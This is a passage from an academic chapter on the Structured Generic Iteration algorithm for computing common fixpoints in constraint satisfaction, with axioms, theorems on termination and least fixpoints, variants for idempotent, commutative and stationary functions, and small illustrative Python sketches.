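# choices approximates the infinite sequence.
def iterate(bottom, choices):
    seq = [bottom]
    for f in choices:
        seq.append(f(seq[-1]))
    return seq

def stabilises_at(seq):
    # First index i such that the (finite) tail is constantly seq[i].
    # For a finite prefix the last index qualifies trivially, so this
    # only witnesses stabilisation relative to the computed prefix.
    for i in range(len(seq)):
        if all(x == seq[i] for x in seq[i + 1:]):
            return i
```

For instance, iterating $f(x) := \min(x + 1, 3)$ from $0$ yields a sequence that stabilises at its fourth element.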
In this chapter, we shall mainly be concerned with iterations of $F$ functions that stabilise at some specific points: in fact, we shall be interested in iterations that stabilise at a common fixpoint of all the functions: namely, an element $o \in O$ such that
$$f(o) = o \text{ for all } f \in F.$$
Indeed, it is not sufficient for an iteration to stabilise at $o$ for this to be a common fixpoint of all the $F$ functions, as the following simple example illustrates.
**Example 3.2.1.** Consider $O := \{0, 1, 2\}$ and the set $F$ with the following two functions:
$$f(0) := 0, f(1) := 2 \text{ and } f(2) := 2,$$
$$g(0) := 1, g(1) := 1 \text{ and } g(2) := 2.$$
Now, consider the iteration $(o_n : n \in \mathbb{N})$ based on $0$ such that $o_{n+1} := f(o_n)$ for every $n \in \mathbb{N}$. Indeed, the iteration stabilises at $0$; but this is not a fixpoint of $g$ since $g(0) \neq 0$.
In the above Example 3.2.1, the function $g$ is never selected. Would it be sufficient to choose $g$ after $f$ to guarantee that $o$ is a common fixpoint of the $F$ functions? Certainly not: define first $o_1 := f(o_0) = 0$, then $o_{j+1} := g(o_j)$ for $j > 0$. This iteration stabilises at $1$ and not at $2$, which is the only common fixpoint of the two functions $f$ and $g$. We can repeat the above trick infinitely many times, one for every $k > 0$: in fact, it is sufficient to set $o_{i+1} := f(o_i)$ for $0 \leq i < k$, and $o_{j+1} := g(o_j)$ for $j \geq k$; still the resulting iteration stabilises at $1$. How can we remedy this? The answer is given below, by the algorithm schema in Section 3.3: this is designed to compute a common fixpoint of finitely many functions.
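Example 3.2.1 and the subsequent discussion can be checked directly in code (a sketch; the two functions are encoded as finite maps):

```python
# The two functions of Example 3.2.1 on O = {0, 1, 2}.
f = {0: 0, 1: 2, 2: 2}.get
g = {0: 1, 1: 1, 2: 2}.get

# Iterating f alone from 0 stabilises at 0, which is not a fixpoint of g.
o = 0
for _ in range(10):
    o = f(o)
assert o == 0 and g(o) != o

# Switching to g after f does not help: the iteration stabilises at 1,
# while the only common fixpoint of f and g is 2.
o = f(0)
for _ in range(10):
    o = g(o)
assert o == 1 and f(2) == 2 == g(2)
```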
### 3.3 The Basic Iteration Schema
The Structured Generic Iteration algorithm, briefly SGI, is a slightly more general version of the Generic Iteration algorithm of [Apt00a]. Both of them aim at computing a common fixpoint of finitely many functions, simply by iterating them until such a fixpoint is computed. The SGI algorithm is more general in that its first execution can start with a subset of all the given functions; then these are introduced, *only if necessary*, in subsequent iterations. So SGI covers more algorithms than the Generic Iteration algorithm does.
The SGI algorithm is displayed as Algorithm 3.3.1. Its parameters are characterised as follows.
**Convention 3.3.1 (SGI).**
- $F$ is a finite set of functions, all defined on the same set $O$;
- \( \bot \) is an element of \( O \);
- \( F_\bot \) is a subset of \( F \) that enjoys the following property: every \( F \) function \( f \) such that \( f(\bot) \neq \bot \) belongs to \( F_\bot \);
- \( G \) is a subset of \( F \) functions;
- \( \text{update} \) instantiates \( G \) to a subset of \( F \).
**Algorithm 3.3.1: SGI($\bot, F_\bot, F$)**

$$
\begin{align*}
& o := \bot; \\
& G := F_\bot; \\
& \text{while } G \neq \emptyset \text{ do} \\
& \quad \text{choose } g \in G; \\
& \quad G := G - \{g\}; \\
& \quad o' := g(o); \\
& \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad \quad o := o'
\end{align*}
$$
As we shall see below, the $\text{update}$ operator returns a subset of $F$ according to the functions in $G$, the current $O$ value $o$ and the $F$ function $g$; its computation can be expensive, unless some information on the chosen function $g$ and input value $o$ is provided that can help to compute the $F$ functions returned by $\text{update}$, as we shall see in Chapter 4. Besides, in the SGI schema above, the function $g$ is chosen non-deterministically; no strategy for choosing $g$ is imposed in this schema, and this is done on purpose, since SGI aims at being a general template for a number of CSP algorithms. Indeed, the complexity of the algorithm will vary according to the way in which the $\text{update}$ operator is specified and the function $g$ chosen.
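Algorithm 3.3.1 admits a direct transcription in Python. This is a sketch: `update` and the choice strategy are parameters, since the schema deliberately leaves both open.

```python
# Structured Generic Iteration (Algorithm 3.3.1). `update` is expected
# to follow Convention 3.3.1 / Axiom 3.3.1; `choose` stands in for the
# schema's non-deterministic choice of g in G.
def sgi(bottom, F_bot, F, update, choose=None):
    choose = choose or (lambda G: next(iter(G)))
    o, G = bottom, set(F_bot)
    while G:
        g = choose(G)
        G.discard(g)               # G := G - {g}
        o2 = g(o)                  # o' := g(o)
        if o2 != o:
            G |= update(G, F, g, o)  # re-schedule affected functions
            o = o2
    return o
```

On Example 3.2.1 with an axiom-compliant `update`, both instantiations $F_\bot := \{g\}$ and $F_\bot := \{f, g\}$ compute the common fixpoint 2.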
### 3.3.1 The basic theory of SGI
The SGI algorithm is devised to compute a common fixpoint of the \( F \) functions: i.e., an element \( o \in O \) such that \( f(o) = o \) for every \( f \in F \). Suppose that the following predicate
\[
\forall f \in F - G \ f(o) = o \quad \text{(Inv)}
\]
is an invariant of the while loop of the SGI algorithm. If \( o \) is the last input of a terminating execution of SGI, then \( G \) is the empty set and the predicate \( \text{Inv} \) above implies that \( o \) is a common fixpoint of all the \( F \) functions. We restate this as the following fact, which is used over and over in the remainder of this chapter.
**Fact 3.3.1 (Common Fixpoint).** Suppose that the above predicate Inv is an invariant of the while loop of SGI. If $o$ is the last input of a terminating execution of SGI, then $o$ is a common fixpoint of the $F$ functions. $\square$
**Common fixpoint**
The Common Fixpoint Fact 3.3.1 above suggests a simple, yet sufficient condition for SGI to compute a common fixpoint of the \( F \) functions: after an iteration of the while loop, we only need to keep, in \( G \), the functions for which the input value of the while loop is not a fixpoint. As for this, it is sufficient that the update operator in SGI satisfies the following axiom.
**Axiom 3.3.1 (Common Fixpoint).** Let $o' := g(o)$ for $g \in F$, and $\text{Id}(g, o') := \{g\}$ if $g(o') \neq o'$, else $\text{Id}(g, o')$ is the empty set. If $o' \neq o$, then
\[
\text{update}(G, F, g, o) \supseteq \{ f \in (F - G) : f(o) = o \text{ and } f(o') \neq o' \} \cup \text{Id}(g, o');
\]
otherwise \( \text{update}(G, F, g, o) \) is the empty set.
In other words, the update operator adds to \( G \) at least all the \( F \) functions, not already in \( G \), for which \( o \) is a fixpoint and the new value \( o' \) is not; besides, \( g \) has to be added back to \( G \) if \( g(o') \neq o' \).
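Read with the containment taken as equality, Axiom 3.3.1 pins down a minimal `update` operator; in Python (a sketch, encoding the functions as finite maps as before):

```python
# Minimal update satisfying the Common Fixpoint Axiom 3.3.1: return the
# F functions outside G for which o is a fixpoint but o' = g(o) is not,
# together with g itself whenever g(o') != o' (the set Id(g, o')).
def update(G, F, g, o):
    o2 = g(o)
    if o2 == o:
        return set()
    new = {f for f in F if f not in G and f(o) == o and f(o2) != o2}
    if g(o2) != o2:
        new.add(g)
    return new
```

On Example 3.2.1, applying $g$ at $0$ schedules exactly $f$, and nothing needs re-scheduling once $f$ is already pending.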
**Lemma 3.3.2 (Invariance).** Let us assume the Common Fixpoint Axiom 3.3.1. Then the Inv predicate on p. 31 is an invariant of the while loop of SGI.

**Proof.** The base step follows from the definition of $F_\bot$ (see Convention 3.3.1 above), and the induction step is easily proved by means of the Common Fixpoint Axiom 3.3.1. $\square$
The above Common Fixpoint Fact 3.3.1 and Invariance Lemma 3.3.2 immediately imply the following theorem.
**Theorem 3.3.3 (Common Fixpoint).** Let us assume the Common Fixpoint Axiom 3.3.1. If $o$ is the last input of a terminating execution of the SGI algorithm, then $o$ is a common fixpoint of all the $F$ functions. $\square$
**Example 3.3.4.** Let us consider Example 3.2.1 as input to SGI so that $\bot := 0$. First, assume $F_\bot := \{g\}$. In the first while loop, only $g$ can be chosen and applied; so, after the loop, $o$ is set equal to 1. In the same loop, update adds $f$ to $G$ and $g$ is removed from $G$. So, at the end of the first loop, $G = \{f\}$ and $o = 1$. Then $f$ is chosen and applied to 1, $o$ is set equal to 2 and $G$ to the empty set at the end of the loop. So SGI terminates by computing 2, a common fixpoint of the two functions. Instead, if $F_\bot$ is instantiated to the whole set $F := \{ f, g \}$, there are two possible executions of SGI, both terminating with 2. Note that, given Convention 3.3.1 and Axiom 3.3.1, there are three different executions of the SGI algorithm with $F := \{ f, g \}$ and $\bot := 0$.
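The claim that every execution terminates with 2 can be verified mechanically by exploring all possible choices of $g$ at every step (a sketch; `update` is the minimal operator suggested by Axiom 3.3.1):

```python
# Exhaustively explore the non-determinism of SGI on Example 3.2.1:
# every execution, for either instantiation of F_bot, computes 2.
f = {0: 0, 1: 2, 2: 2}.get
g = {0: 1, 1: 1, 2: 2}.get
F = [f, g]

def update(G, F, h, o):
    o2 = h(o)
    new = {k for k in F if k not in G and k(o) == o and k(o2) != o2}
    return new | ({h} if h(o2) != o2 else set())

def all_results(bottom, F_bot):
    results, stack = set(), [(bottom, frozenset(F_bot))]
    while stack:                   # DFS over the choice of g in G
        o, G = stack.pop()
        if not G:
            results.add(o)
            continue
        for h in G:
            G2 = G - {h}
            o2 = h(o)
            if o2 != o:
                stack.append((o2, G2 | frozenset(update(G2, F, h, o))))
            else:
                stack.append((o, G2))
    return results

assert all_results(0, {g}) == {2}
assert all_results(0, {f, g}) == {2}
```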
### SGI iterations
We started this chapter with generic iterations of functions, and provided a schema that computes a common fixpoint of finitely many functions. Hereby we show how function iterations and the SGI schema are related. First of all, let us denote by $id$ the identity function on the domain of the iterated functions of $F$; indeed all the common fixpoints of the $F$ functions are, trivially, fixpoint of $id$. Then every execution of SGI gives rise to an iteration of the $F \cup \{ id \}$ functions. To explain how, we first introduce traces of SGI executions.
Consider an execution of the SGI algorithm — see Algorithm 3.3.1. The SGI trace $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ of the execution is defined as follows:
- $o_0 := \bot, G_0 := F_\bot$;
- suppose that $o_n$ and $G_n$ are the input of the $n$-th while loop of SGI. If $G_n$ is the empty set, then $o_{n+1} := id(o_n)$ and $G_{n+1} := \emptyset$. Otherwise, let $g$ be the chosen function and set $o_{n+1}$ equal to $g(o_n)$. Then we define $G_{n+1}$ as the set $(G_n - \{ g \}) \cup \text{update}(G_n, F, g, o_n)$ if $o_{n+1} \neq o_n$, else as the set $G_n - \{ g \}$.
Then $\langle o_n : n \in \mathbb{N} \rangle$ is an SGI iteration of the $F$ functions.
**Example 3.3.5.** Let us revisit Example 3.3.4. There we have the following three SGI traces:
1. $\langle (0, \{ g \}), (1, \{ f \}), (2, \emptyset), \ldots \rangle$;
2. $\langle (0, \{ f, g \}), (0, \{ g \}), (1, \{ f \}), (2, \emptyset), \ldots \rangle$;
3. $\langle (0, \{ f, g \}), (1, \{ f \}), (2, \emptyset), \ldots \rangle$.
The first trace corresponds to the SGI instantiation with $F_\bot := \{ g \}$; whereas the SGI instantiation related to the second and third traces is for $F_\bot := \{ f, g \}$.
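The first trace can be recomputed step by step (a sketch; the trailing constant pairs of the stabilised trace are omitted, and `update` is again the minimal operator of Axiom 3.3.1):

```python
# Recompute SGI trace 1 of Example 3.3.5: F_bot = {g}, based on 0.
f = {0: 0, 1: 2, 2: 2}.get
g = {0: 1, 1: 1, 2: 2}.get
name = {f: 'f', g: 'g'}

def update(G, F, h, o):
    o2 = h(o)
    new = {k for k in F if k not in G and k(o) == o and k(o2) != o2}
    return new | ({h} if h(o2) != o2 else set())

o, G = 0, {g}
trace = [(o, {name[k] for k in G})]
while G:
    h = G.pop()                  # G happens to be a singleton at each step
    o2 = h(o)
    if o2 != o:
        G |= update(G, [f, g], h, o)
        o = o2
    trace.append((o, {name[k] for k in G}))

assert trace == [(0, {'g'}), (1, {'f'}), (2, set())]
```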
Traces provide another tool to formulate and study properties of SGI, like termination. We shall say that the trace $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ stabilises at $o_k$ iff the iteration $\langle o_n : n \in \mathbb{N} \rangle$ does so and $G_k = \emptyset$. Now, the termination condition for the while loop in SGI is that $G$ must be empty; the last input $o$ of a terminating execution of SGI is the value computed by SGI. Hence it is easy to check that the following statements are equivalent:
1. the SGI algorithm terminates by computing $o$;
2. the SGI trace stabilises at $o_k = o$.
We reformulate this equivalence as the following fact, as it will allow us to switch from executions of SGI to traces, and vice versa, when dealing with the termination of SGI.
**Fact 3.3.6.** An execution of the SGI algorithm terminates by computing $o$ iff the associated trace stabilises at $o$.
### 3.3.2 Ordering Iterations
Suppose that we can define a partial order $\sqsubseteq$ over the set $O$. Then this can be used to order iterations.
#### Least common fixpoint
Suppose that the $F$ functions are monotone with respect to a partial order $\sqsubseteq$ on $O$; namely, for every $f \in F$,
$$ o \sqsubseteq o' \implies f(o) \sqsubseteq f(o'). $$
Then we can prove that the common fixpoints of the $F$ functions, as computed by SGI, coincide with the least fixpoint of the $F$ functions. So let us assume the following statement.
**Axiom 3.3.2 (Least Fixpoint).**
(i). The structure $\langle O, \sqsubseteq, \bot \rangle$ is a partial ordering with bottom $\bot \in O$.
(ii). The $F$ functions are all monotone with respect to $\sqsubseteq$.
Given the above axiom, we have the following lemma as in [Apt00a].
**Lemma 3.3.7 (Stabilisation).** Assume the Common Fixpoint Axiom 3.3.1 and the Least Fixpoint Axiom 3.3.2. Consider a fixpoint $w$ of the $F$ functions. Let $\langle o_i : i \in \mathbb{N} \rangle$ be a generic iteration of $F$ that satisfies the following properties:
- $o_0 := \bot$;
- $o_{i+1} := g(o_i)$, for some $g \in F$.
Then $o_i \sqsubseteq w$ for every element $o_i$ of the iteration $\langle o_i : i \in \mathbb{N} \rangle$.
**Proof.** The proof is by induction on $i \in \mathbb{N}$. The base case is trivial since $\bot$ is the bottom of the ordering. As for the induction step, let us assume that $o_i \sqsubseteq w$. Thus, we invoke monotonicity (see Axiom 3.3.2) and obtain $o_{i+1} := g(o_i) \sqsubseteq g(w) = w$, where the last equality holds because $w$ is a fixpoint of $g$. $\square$
The above lemma shows how a partial ordering can be used to compare computations of SGI with functions on the ordering, and highlights the role of monotonicity in the following result, which follows from the lemma and Theorem 3.3.3.
**Theorem 3.3.8 (Least Fixpoint).** Let $F$ be a finite set of functions over $O$, and assume the Common Fixpoint Axiom 3.3.1 and the Least Fixpoint Axiom 3.3.2. Then all the terminating executions of SGI compute the same value: i.e., the least common fixpoint of all the $F$ functions with respect to the partial order on $O$. □
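Theorem 3.3.8 can be illustrated with hypothetical monotone, inflationary functions on the subsets of $\{1, 2, 3\}$, ordered by inclusion with bottom $\{1\}$ (the functions and names are ours, chosen for illustration):

```python
# Two monotone, inflationary functions on (P({1,2,3}), subset-of):
# f adds 2 whenever 1 is present, g adds 3 whenever 2 is present.
f = lambda s: s | {2} if 1 in s else s
g = lambda s: s | {3} if 2 in s else s

def round_robin(bottom, order):
    # Iterate the functions in the given order until a common fixpoint.
    o, changed = bottom, True
    while changed:
        changed = False
        for h in order:
            o2 = h(o)
            if o2 != o:
                o, changed = o2, True
    return o

# Whatever the order, the result is the least common fixpoint {1, 2, 3}.
assert round_robin(frozenset({1}), [f, g]) == {1, 2, 3}
assert round_robin(frozenset({1}), [g, f]) == {1, 2, 3}
```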
**Termination**
From this point onwards, let us write $o \sqsubset o'$ whenever $o \sqsubseteq o'$ and $o \neq o'$. A $\sqsubseteq$-chain in $O$ is any subset of $O$ that is totally ordered by $\sqsubseteq$.
In order to ensure the termination of SGI, for any input, we must ascertain that every SGI iteration stabilises. If all the $F$ functions are computable, every SGI iteration is totally ordered by $\sqsubseteq$, and all $\sqsubseteq$-chains are finite, then we can guarantee termination. The following axiom formalises these ideas.
**Axiom 3.3.3 (Termination).**
- Each $f \in F$ is a computable function over a partial ordering with bottom $(O, \sqsubseteq, \bot)$.
- The $F$ functions are inflationary with respect to the partial order: namely, $o \sqsubseteq f(o)$ for every $o \in O$ and $f \in F$.
- The ordering $(O, \sqsubseteq)$ satisfies the ascending chain condition (ACC), i.e. each $\sqsubseteq$-chain in $O$ is finite.
Now, given the above axiom, we can prove the following termination result.
**Theorem 3.3.9 (Termination 1).** Assume the Common Fixpoint Axiom 3.3.1 and the Termination Axiom 3.3.3. Then SGI always terminates, computing a common fixpoint of the $F$ functions.
**Proof.** At each iteration of the while loop, either $o \sqsubset o'$ — due to inflationarity, see Axiom 3.3.3 — or $g$ is removed from $G$. Axiom 3.3.3 yields that all $\sqsubseteq$-chains are finite; since $G \subseteq F$ is finite too, the algorithm terminates. □
Notice that every finite partial ordering satisfies the ACC in Axiom 3.3.3; moreover, every function on a finite set is computable. Thus we draw the following conclusion as a corollary of Theorem 3.3.9.
**Corollary 3.3.10 (Termination 2).** Let us assume the Common Fixpoint Axiom 3.3.1 and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \sqsubseteq, \bot)$. Suppose that the $F$ functions are inflationary with respect to $\sqsubseteq$. Then every execution of SGI terminates. □
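The situation of Corollary 3.3.10 can be made concrete with a small executable sketch (all names are hypothetical, not the author's code). Here the partial ordering is the finite powerset lattice $(\mathcal{P}(\{1,2\}), \subseteq, \emptyset)$, and the two iterated functions are inflationary and monotone, so the loop terminates at their least common fixpoint regardless of the scheduling order; the update step simply re-schedules every function that does not fix the new value, which satisfies the Common Fixpoint Axiom 3.3.1.

```python
def gi(bot, funcs):
    # Generic-iteration sketch: G starts as the whole set of functions (GI);
    # with inflationary, monotone funcs on a finite ordering the loop
    # terminates at the least common fixpoint (Corollary 3.3.10).
    o = bot
    G = list(funcs)
    while G:
        g = G.pop()
        o_new = g(o)
        if o_new != o:
            # update: re-schedule every function not fixing the new value
            G = [f for f in funcs if f(o_new) != o_new]
            o = o_new
    return o

# two inflationary, monotone functions on subsets of {1, 2}
f1 = lambda s: s | {1}
f2 = lambda s: s | {2} if 1 in s else s

least = gi(frozenset(), [f1, f2])
print(sorted(least))  # -> [1, 2], whichever scheduling order is used
```

Note that swapping the order of `f1` and `f2` in the input list leaves the result unchanged, in accordance with Theorem 3.3.8.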
**Note 3.3.11.** Many algorithms for CSPs deal with finite domains. Whenever those algorithms are instances of SGI, the above Corollary 3.3.10 ensures that a simple condition on the iterated functions is sufficient to guarantee the termination of the instance algorithms. However, functions for non-standard CSPs, as in Chapter 5, often have infinite domains; then Corollary 3.3.10 is of no help, and we shall need to resort to the above Theorem 3.3.9.
### 3.3.3 Finale
The main results concerning the basic SGI algorithm schema are collected in the following corollary, which gathers Theorems 3.3.3, 3.3.8, 3.3.9 and Corollary 3.3.10. Figure 3.1 depicts a search tree of SGI, under the assumptions of either one of the statements in the following corollary.
**Corollary 3.3.12.**
(i). Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGI terminates by computing the least common fixpoint o of the iterated functions.
(ii). Assume the Common Fixpoint Axiom 3.3.1 and that the F functions are defined on a finite partial ordering with bottom \( (O, \sqsubseteq, \perp) \). Suppose that the F functions are all monotone and inflationary with respect to \( \sqsubseteq \). Then every execution of SGI terminates by computing the least common fixpoint o of the iterated functions. \( \square \)
---
**Figure 3.1:** SGI search tree.
3.4 Variations of the Basic Schema
3.4.1 The Generic Iteration Schema
We started Section 3.3 by claiming that SGI is a slightly more general version of the Generic Iteration (GI) algorithm of [Apt00a]. We shall also need to refer to the latter schema in Chapter 4, and hence we explain it in more detail below.
The difference between the two basic schemas is that the set of functions $G$ in GI is initialised to the whole set of functions $F$: i.e., $F_\bot$ is taken to be the whole set $F$. Therefore, we have the following results for GI as a consequence of Corollary 3.3.12.
**Theorem 3.4.1.**
(i) Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then GI always terminates by computing the least common fixpoint of the iterated functions.
(ii) Assume the Common Fixpoint Axiom 3.3.1 on update and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \sqsubseteq, \bot)$. Suppose that the $F$ functions are monotone and inflationary with respect to $\sqsubseteq$. Then GI always terminates, computing the least common fixpoint of the iterated functions.$\Box$
3.4.2 Iterations Modulo Function Properties
The GI algorithm is a variation of SGI in that $G$ is differently initialised. Other variations of the basic schema SGI are obtained by optimising the instantiation of $G$ in the while loop via update: in SGI, all the functions for which the newly computed value $o' = g(o)$ is not a fixpoint are added to $G$. Indeed, the more functions are added to $G$, the more executions of the while loop are needed. In the following, we study some properties of functions that allow us to reduce the number of executions of the while loop by an efficient instantiation of $G$ via update. Each property is studied separately and gives rise to a different version of the SGI schema; all these or their combinations will be used in Chapter 4.
**Idempotent functions**
Notice that the chosen function $g$ is removed from the set $G$ of iterated functions in SGI if the test $gg(o) = g(o)$ returns true. This is always true, independently of the specific value $o$, if $g$ is idempotent, as specified below.
**Definition 3.4.2.** A function $g : O \rightarrow O$ is idempotent if $gg(o) = g(o)$ for every $o \in O$.
As suggested above, an idempotent function can always be removed after being chosen. The following diagram shows what happens otherwise.
\[ o \rightarrow g(o) \rightarrow gg(o) \]
So any iteration as above can be equivalently reduced to one in which the second application of \( g \) is removed, if this function is idempotent; i.e., \( Id(g, o') \), as in the Common Fixpoint Axiom 3.3.1, is always set to the empty set for \( g \) idempotent. The following lemma is an immediate consequence of that axiom and Definition 3.4.2 above.
**Lemma 3.4.3 (Idempotency).** Consider a finite set \( F \) of idempotent functions on \( O \). Then
\[
\text{update}(G, F, g, o) \supseteq G \cup \{ f \in F - G : f(o) = o \text{ and } f(o') \neq o' \}
\]
satisfies the Common Fixpoint Axiom 3.3.1. \( \square \)
Let us call SGII the version of SGI with the update operator as in Lemma 3.4.3, where the second I stands for Idempotent. Then the following theorem is a trivial consequence of that lemma and Corollary 3.3.12.
**Theorem 3.4.4.**
(i). Assume the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGII terminates by computing the least common fixpoint of the iterated functions, if these are all idempotent.
(ii). Assume that the \( F \) functions are defined on a finite partial ordering with bottom \( (O, \sqsubseteq, \bot) \). Suppose that the \( F \) functions are all monotone and inflationary with respect to \( \sqsubseteq \). Then every execution of SGII terminates, computing the least common fixpoint of the iterated functions, if these are all idempotent. \( \square \)
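To illustrate Definition 3.4.2 concretely: typical domain-pruning functions are idempotent, since filtering a domain twice with the same test removes nothing new. A small hypothetical sketch (the function and domain names are illustrative assumptions):

```python
def prune_even_x(d):
    # hypothetical pruning function on a dict of variable domains:
    # keep only the odd values in x's domain
    return {**d, "x": frozenset(v for v in d["x"] if v % 2 == 1)}

d0 = {"x": frozenset({1, 2, 3, 4})}
d1 = prune_even_x(d0)
# idempotency: g(g(o)) == g(o), so SGII never needs to re-add g
# immediately after applying it
print(prune_even_x(d1) == d1)  # -> True
```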
**Commutative functions**
Commutativity of an operation is a useful property in computations: it means that the operation provides the same result regardless of permutations of the combined elements. Function composition is not, in general, a commutative operation. However, there are classes of functions on which composition is commutative, so that the order in which these functions are composed is irrelevant. The following definition aims at capturing precisely this, and it is a special case of the notion of the centraliser of an element with respect to a given operation, as in group theory; see for instance [Her75].
**Definition 3.4.5.** Let $F$ be a set of functions over a set $O$, consider a function $g : O \rightarrow O$, and the subset $\text{Comm}(F, g)$ of $F$ of all functions $f$ such that
$$fg(o) = gf(o), \text{ for all } o \in O.$$
Then the set $\text{Comm}(F, g)$ is the set of $F$ functions that *commute* with $g$.
As stated and proved in [Apt00a], commutativity can be exploited to reduce executions in the GI algorithm. This carries over to the SGI schema in the same manner.
**Lemma 3.4.6.** If the update operator satisfies the Common Fixpoint Axiom 3.3.1, then so does $\text{update}(G, F, g, o) - \text{Comm}(F, g)$.
**Proof.** Suppose that $fg(o) = gf(o)$ and $f(o) = o$; then $fg(o) = gf(o) = g(o)$, i.e. $f$ also fixes the new value $g(o)$ and need not be re-scheduled. Thus $\text{update} - \text{Comm}$ satisfies the Common Fixpoint Axiom 3.3.1 if $\text{update}$ does. □
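For instance (a hypothetical sketch; the variable and function names are illustrative assumptions), two pruning functions acting on disjoint variables commute, so each belongs to $\text{Comm}(F, g)$ of the other and Lemma 3.4.6 lets SGIc avoid re-scheduling it:

```python
def prune_x(d):
    # keep only the positive values in x's domain
    return {**d, "x": frozenset(v for v in d["x"] if v > 0)}

def prune_y(d):
    # keep only the values below 10 in y's domain
    return {**d, "y": frozenset(v for v in d["y"] if v < 10)}

d = {"x": frozenset({-1, 1}), "y": frozenset({5, 50})}
# fg(o) == gf(o): the two functions commute, so if prune_y fixes d,
# it also fixes prune_x(d) and need not be re-scheduled
print(prune_x(prune_y(d)) == prune_y(prune_x(d)))  # -> True
```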
Let us rename SGI with Commutativity, briefly SGIc, the SGI algorithm with $\text{update} - \text{Comm}$ in place of $\text{update}$. The above Lemma 3.4.6 allows us to transfer, to SGIc, all the results concerning SGI as summarised in Corollary 3.3.12.
**Theorem 3.4.7.**
(i). Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then SGIc always terminates by computing the least common fixpoint of the iterated functions.
(ii). Assume the Common Fixpoint Axiom 3.3.1 on update and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \sqsubseteq, \bot)$. Suppose that the $F$ functions are all monotone and inflationary with respect to $\sqsubseteq$. Then SGIc always terminates, computing the least common fixpoint of the iterated functions. □
**Stationary functions**
While the properties of idempotency and commutativity do not rely on any partial order on the given set $O$, the following property does.
**Definition 3.4.8.** Let $f$ be an inflationary function, defined over a partial ordering $(O, \sqsubseteq)$. Then the function $f$ is *stationary from* $o, o' \in O$ if it enjoys the following property:

$$\text{if } f(o) \neq o, \; o \sqsubseteq o' \text{ and } f(o') \sqsubseteq o'' \text{ then } f(o'') = o''.$$

More generally, an inflationary function $f$ is *stationary* if there exist $o, o' \in O$ such that $f$ is stationary from them.
In other words: consider a totally ordered iteration and suppose that a stationary function $f$ is known to affect a value $o$ in it; after the first application of $f$ to $o$ or a subsequent value $o'$ in the iteration, $f$ does not change any value that follows in the iteration. The following diagram shows schematically what happens whenever a stationary function $f$ is applied again, after $f$ modifies a value in the iteration.
In brief, such an iteration can equivalently be reduced to one in which the second application of $f$ is removed, if this function is stationary. The lemma below states precisely that stationary functions can be added at most once to $G$, namely the set of functions to iterate.
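As a small illustration (hypothetical names, with the powerset lattice ordered by inclusion): the function that adds a fixed element to a set is stationary, since once it has fired, every later, larger value already contains the element, and the function fixes it.

```python
f = lambda s: s | {1}  # inflationary on subsets of {1, 2}: adds the element 1

o0 = frozenset()         # f(o0) != o0: f fires here
o1 = frozenset({1})      # a later value in the iteration, with o0 a subset of o1
o2 = frozenset({1, 2})   # f(o1) is a subset of o2, so by stationarity f fixes o2
print(f(o0) != o0 and f(o2) == o2)  # -> True
```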
In order to formulate the lemma properly, we resort to traces and state the following axiom.
**Axiom 3.4.1 (stationarity).**
(i) The $F$ functions are all stationary on $\langle O, \sqsubseteq, \bot \rangle$ and, if $f \in F_\bot$ and $f(\bot) = \bot$, then $f$ is the identity on $O$.
(ii) If $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ is the trace of an execution of $SGI$, $G_n$ denotes the set of $G$ functions at the $n$-th while loop of $SGI$; then put
$$update(G_n, F, g, o_n) := \left\{ f \in F - \bigcup_{k \leq n} G_k : f(o_n) = o_n, f(o_{n+1}) \neq o_{n+1} \right\};$$
this for every $n$.
Now we can formulate the following Stationarity Lemma: there we assume that the $F$ functions are idempotent, since this simplifies the proof, even though the extension to the non-idempotent case is possible.
**Lemma 3.4.9 (stationarity).** Assume the Stationarity Axiom 3.4.1 and that all the $F$ functions are idempotent. Then $update$ satisfies the Common Fixpoint Axiom 3.3.1.
**Proof.** We only need to prove that, if $f \in \bigcup_{k<n} G_k$ and $f \notin G_n$, then $f(o_{n+1}) = o_{n+1}$. If $f \in F_\bot$ and $f(\bot) = \bot$, then $f(o_{n+1}) = o_{n+1}$ by Axiom 3.4.1. Else, there must be $o_i$ in the iteration such that $i < n$ and $f(o_i) \neq o_i$, due to Axiom 3.4.1 again. Since $f \notin G_n$, then there exists $i \leq j < n$ and $o_j$ in the iteration such that $o_{j+1} = f(o_j)$. Therefore, inflationarity yields the following:
$$o_i \sqsubseteq o_j \text{ and } f(o_j) = o_{j+1} \sqsubseteq o_n \sqsubset o_{n+1}.$$
Thus we can conclude that \( o_i \neq f(o_i), o_i \sqsubseteq o_j \) and \( f(o_j) \sqsubseteq o_{n+1} \) hold. Then Definition 3.4.8 yields \( f(o_{n+1}) = o_{n+1} \). \( \square \)
In Chapter 4, we make extensive use of the variation of the SGI algorithm with stationary and idempotent functions. So we write out SGI with Stationary and Idempotent functions as the SGIIS Algorithm 3.4.1.
Algorithm 3.4.1: SGIIS(\( \perp, F_\perp, F \))
\[
\begin{align*}
o & := \perp; \\
G & := \emptyset; \\
\text{while } F_\perp \neq \emptyset \text{ do} \\
& \quad \text{choose } g \in F_\perp; \\
& \quad F_\perp := F_\perp - \{g\}; \\
& \quad o' := g(o); \\
& \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad \quad F := F - \text{update}(G, F, g, o); \\
& \quad \quad o := o'; \\
& \quad \text{while } G \neq \emptyset \text{ do} \\
& \quad \quad \text{choose } g \in G; \\
& \quad \quad G := G - \{g\}; \\
& \quad \quad o' := g(o); \\
& \quad \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad \quad \quad F := F - \text{update}(G, F, g, o); \\
& \quad \quad \quad o := o';
\end{align*}
\]
